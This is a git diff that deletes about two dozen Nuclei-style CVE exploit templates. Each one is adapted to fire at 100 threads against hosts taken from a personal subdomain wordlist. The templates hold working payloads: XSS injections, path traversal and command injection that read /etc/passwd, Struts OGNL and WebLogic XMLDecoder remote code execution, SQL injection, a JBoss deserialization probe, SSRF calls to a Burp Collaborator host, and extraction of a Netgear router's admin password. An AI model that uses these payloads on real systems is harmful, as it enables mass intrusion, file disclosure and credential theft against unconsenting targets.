- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000155-2742.yaml b/tmp/cve/cve-2016-1000155-2742.yaml
deleted file mode 100644
index 6a5a8da7e3..0000000000
--- a/tmp/cve/cve-2016-1000155-2742.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2016-1000155
-info:
- name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-10960-2765.yaml b/tmp/cve/cve-2016-10960-2765.yaml
deleted file mode 100644
index 9c528ee11f..0000000000
--- a/tmp/cve/cve-2016-10960-2765.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-10960
-info:
- name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
- author: daffainfo
- severity: critical
- description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
- reference: |
- - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
- - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
- tags: cve,cve2016,wordpress,wp-plugin,rce
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1
- Host: {{Subdomains}}
-
- wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Nuclei: CVE-2016-10960"
- condition: and
- part: header
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-10993-2769.yaml b/tmp/cve/cve-2016-10993-2769.yaml
deleted file mode 100644
index 8dee3efd94..0000000000
--- a/tmp/cve/cve-2016-10993-2769.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2016-10993
-info:
- name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: |
- - https://www.vulnerability-lab.com/get_content.php?id=1808
- - https://nvd.nist.gov/vuln/detail/CVE-2016-10993
- tags: cve,cve2016,wordpress,wp-theme,xss
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-2389-2778.yaml b/tmp/cve/cve-2016-2389-2778.yaml
deleted file mode 100644
index 4c742bca33..0000000000
--- a/tmp/cve/cve-2016-2389-2778.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2016-2389
-info:
- name: SAP xMII 15.0 - Directory Traversal
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
- reference:
- - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- - https://www.cvedetails.com/cve/CVE-2016-2389
- tags: cve,cve2016,lfi,sap
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-3081-2782.yaml b/tmp/cve/cve-2016-3081-2782.yaml
deleted file mode 100644
index d641ec4385..0000000000
--- a/tmp/cve/cve-2016-3081-2782.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2016-3081
-info:
- name: Apache S2-032 Struts RCE
- author: dhiyaneshDK
- severity: high
- description: |
- Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.
- reference: |
- - https://cwiki.apache.org/confluence/display/WW/S2-032
- - https://struts.apache.org/docs/s2-032.html
- tags: cve,cve2016,struts,rce,apache
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 4
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: regex
- regex:
- - "root:[x*]:0:0:"
diff --git a/tmp/cve/cve-2016-4975-2793.yaml b/tmp/cve/cve-2016-4975-2793.yaml
deleted file mode 100644
index f92a608844..0000000000
--- a/tmp/cve/cve-2016-4975-2793.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-4975
-
-info:
- name: Apache mod_userdir CRLF injection
- author: melbadry9,nadino,xElkomy,sullo
- severity: low
- description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
- tags: crlf,generic,cves,cve2016
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2016-4975
- cwe-id: CWE-93
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers:
- - type: regex
- regex:
- - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
- part: header
diff --git a/tmp/cve/cve-2016-5649-2800.yaml b/tmp/cve/cve-2016-5649-2800.yaml
deleted file mode 100644
index 5da94b8577..0000000000
--- a/tmp/cve/cve-2016-5649-2800.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2016-5649
-info:
- name: Netgear DGN2200 / DGND3700 - Admin Password Disclosure
- author: suman_kar
- severity: critical
- description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface.
- tags: cve,cve2016,iot,netgear,router
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /BSW_cxttongr.htm HTTP/1.1
- Host: {{Subdomains}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "Smart Wizard Result "
- part: body
- extractors:
- - type: regex
- name: password
- part: body
- group: 1
- regex:
- - 'Success "([a-z]+)"'
diff --git a/tmp/cve/cve-2016-6277-2806.yaml b/tmp/cve/cve-2016-6277-2806.yaml
deleted file mode 100644
index e3dda80e9b..0000000000
--- a/tmp/cve/cve-2016-6277-2806.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2016-6277
-info:
- name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
- author: pikpikcu
- severity: critical
- description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
- tags: cve,cves2016,netgear,rce,iot
- reference:
- - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
- - https://nvd.nist.gov/vuln/detail/CVE-2016-6277
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-7552-2810.yaml b/tmp/cve/cve-2016-7552-2810.yaml
deleted file mode 100644
index bd6806854a..0000000000
--- a/tmp/cve/cve-2016-7552-2810.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2016-7552
-info:
- name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal
- author: dwisiswant0
- severity: critical
- description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
- reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
- tags: cve,cve2016,lfi
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /cgi-bin/logoff.cgi HTTP/1.1
- Host: {{Subdomains}}
- Cookie: session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "Memory map"
- part: body
diff --git a/tmp/cve/cve-2016-7981-2815.yaml b/tmp/cve/cve-2016-7981-2815.yaml
deleted file mode 100644
index 473b1a581d..0000000000
--- a/tmp/cve/cve-2016-7981-2815.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2016-7981
-info:
- name: SPIP 3.1.2 XSS
- author: pikpikcu
- severity: medium
- description: |
- Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981
- tags: cve,cve2016,xss,spip
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '">'
- part: body
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - text/html
diff --git a/tmp/cve/cve-2016-8527-2818.yaml b/tmp/cve/cve-2016-8527-2818.yaml
deleted file mode 100644
index 82f90e93b5..0000000000
--- a/tmp/cve/cve-2016-8527-2818.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2016-8527
-info:
- name: Aruba Airwave - (XSS)
- author: pikpikcu
- severity: medium
- description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS).
- reference:
- - https://www.exploit-db.com/exploits/41482
- - https://nvd.nist.gov/vuln/detail/CVE-2016-8527
- tags: cve,cve2016,aruba,xss
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2016-8527
- cwe-id: CWE-79
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - text/html
diff --git a/tmp/cve/cve-2017-0929-2821.yaml b/tmp/cve/cve-2017-0929-2821.yaml
deleted file mode 100644
index 4b27ed1e3a..0000000000
--- a/tmp/cve/cve-2017-0929-2821.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2017-0929
-info:
- name: DotNetNuke ImageHandler SSRF
- author: charanrayudu,meme-lord
- severity: high
- description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
- reference:
- - https://hackerone.com/reports/482634
- - https://nvd.nist.gov/vuln/detail/CVE-2017-0929
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
- cve-id: CVE-2017-0929
- cwe-id: CWE-918
- tags: cve,cve2017,oast,ssrf,dnn
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |-
- GET /DnnImageHandler.ashx?mode=file&url=http://{{Host}}.{{Port}}.{{Subdomains}}.2017.0929.{{MY-DOMAIN}} HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
- Accept: */*
- Accept-Encoding: gzip, deflate
diff --git a/tmp/cve/cve-2017-0929-2823.yaml b/tmp/cve/cve-2017-0929-2823.yaml
deleted file mode 100644
index 8bebcae93c..0000000000
--- a/tmp/cve/cve-2017-0929-2823.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: cve-2017-0929
-info:
- name: DotNetNuke ImageHandler SSRF (CVE-2017-0929)
- risk: Potential
-params:
- - root: "{{.BaseURL}}"
- - dest: "gcwyd66hvfkgc5ayfappvqbc93fv3k.burpcollaborator.net"
-# replicate:
-# prefixes: 'REPORTSERVER, ReportServer'
-requests:
- - method: GET
- url: >-
- {{.root}}/DnnImageHandler.ashx?mode=file&url={{.dest}}
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- detections:
- - >-
- StatusCode() == 200 && RegexSearch("body", "(?m)[a-z0-9]+")
-references:
- - links:
- - https://hackerone.com/reports/482634
diff --git a/tmp/cve/cve-2017-0929-2825.yaml b/tmp/cve/cve-2017-0929-2825.yaml
deleted file mode 100644
index 11a71c543b..0000000000
--- a/tmp/cve/cve-2017-0929-2825.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: CVE-2017-0929
-info:
- name: DotNetNuke ImageHandler SSRF (CVE-2017-0929)
- risk: Potential
-params:
- - root: "{{.BaseURL}}"
- - dest: "gcwyd66hvfkgc5ayfappvqbc93fv3k.burpcollaborator.net"
-# replicate:
-
-# prefixes: 'REPORTSERVER, ReportServer'
-requests:
- - method: GET
- url: >-
- {{.root}}/DnnImageHandler.ashx?mode=file&url={{.dest}}
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- detections:
- - >-
- StatusCode() == 200 && RegexSearch("body", "(?m)[a-z0-9]+")
-references:
- - links:
- - https://hackerone.com/reports/482634
diff --git a/tmp/cve/cve-2017-1000028-2829.yaml b/tmp/cve/cve-2017-1000028-2829.yaml
deleted file mode 100644
index 0b3478165c..0000000000
--- a/tmp/cve/cve-2017-1000028-2829.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2017-1000028
-info:
- name: GlassFish LFI
- author: pikpikcu
- severity: high
- description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
- reference: https://www.exploit-db.com/exploits/45196
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "/sbin/nologin"
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-1000170-2839.yaml b/tmp/cve/cve-2017-1000170-2839.yaml
deleted file mode 100644
index 8af2cfd7b8..0000000000
--- a/tmp/cve/cve-2017-1000170-2839.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2017-1000170
-info:
- name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
- author: dwisiswant0
- severity: high
- reference: https://www.exploit-db.com/exploits/49693
- description: jqueryFileTree 2.1.5 and older Directory Traversal
- tags: cve,cve2017,wordpress,wp-plugin,lfi
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1
- Host: {{Subdomains}}
-
- dir=%2Fetc%2F&onlyFiles=true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- - "passwd"
- condition: and
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-1000486-2844.yaml b/tmp/cve/cve-2017-1000486-2844.yaml
deleted file mode 100644
index 339f46b512..0000000000
--- a/tmp/cve/cve-2017-1000486-2844.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: CVE-2017-1000486
-info:
- name: Primetek Primefaces 5.x EL Injection - RCE
- author: Moritz Nentwig
- severity: critical
- description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
- reference: |
- - https://github.com/mogwailabs/CVE-2017-1000486
- - https://github.com/pimps/CVE-2017-1000486
- - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
- tags: cve,cve2017,primetek,rce
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Subdomains}}\nConnection: close\nContent-Length: 160\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"
- matchers:
- - type: word
- words:
- - 'Mogwailabs: CHECKCHECK'
- part: header
diff --git a/tmp/cve/cve-2017-10271-2857.yaml b/tmp/cve/cve-2017-10271-2857.yaml
deleted file mode 100644
index 4764b6918e..0000000000
--- a/tmp/cve/cve-2017-10271-2857.yaml
+++ /dev/null
@@ -1,67 +0,0 @@
-id: CVE-2017-10271
-info:
- name: CVE-2017-10271
- author: dr_set
- severity: high
- description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
- reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
- tags: cve,cve2017,rce,oracle,weblogic
- # Source:- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /wls-wsat/CoordinatorPortType HTTP/1.1
- Host: {{Subdomains}}
- Accept: */*
- Accept-Language: en
- User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
- Connection: close
- Content-Type: text/xml
- Content-Length: 5178
-
-
-
-
-
-
-
- 0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034
-
-
-
- com.supeream.exploits.XmlExp
-
-
-
- cat /etc/passwd
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- matchers:
- - type: regex
- regex:
- - 'root:[x*]:0:0'
- part: body
diff --git a/tmp/cve/cve-2017-11444-2867.yaml b/tmp/cve/cve-2017-11444-2867.yaml
deleted file mode 100644
index 12f24b9cf9..0000000000
--- a/tmp/cve/cve-2017-11444-2867.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: CVE-2017-11444
-info:
- name: Subrion CMS SQL Injection
- author: dwisiswant0
- severity: high
- description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.
- reference: https://github.com/intelliants/subrion/issues/479
- tags: cve,cve2017,sqli,subrion
- # Source:
- # - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "projectdiscovery.io"
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-12149-2880.yaml b/tmp/cve/cve-2017-12149-2880.yaml
deleted file mode 100644
index e56997dbd2..0000000000
--- a/tmp/cve/cve-2017-12149-2880.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: CVE-2017-12149 1
-info:
- name: Java/Jboss Deserialization [RCE]
- author: fopina
- severity: critical
- description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
- reference: |
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- - https://chowdera.com/2020/12/20201229190934023w.html
- - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
- tags: cve,cve2017,java,rce,deserialization
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /invoker/JMXInvokerServlet/ HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
- Connection: close
- Content-Length: 82
- Content-Type: application/octet-stream
- Accept-Encoding: gzip, deflate
-
- {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "ClassCastException"
- part: body
- - type: word
- words:
- - "application/x-java-serialized-object"
- part: header
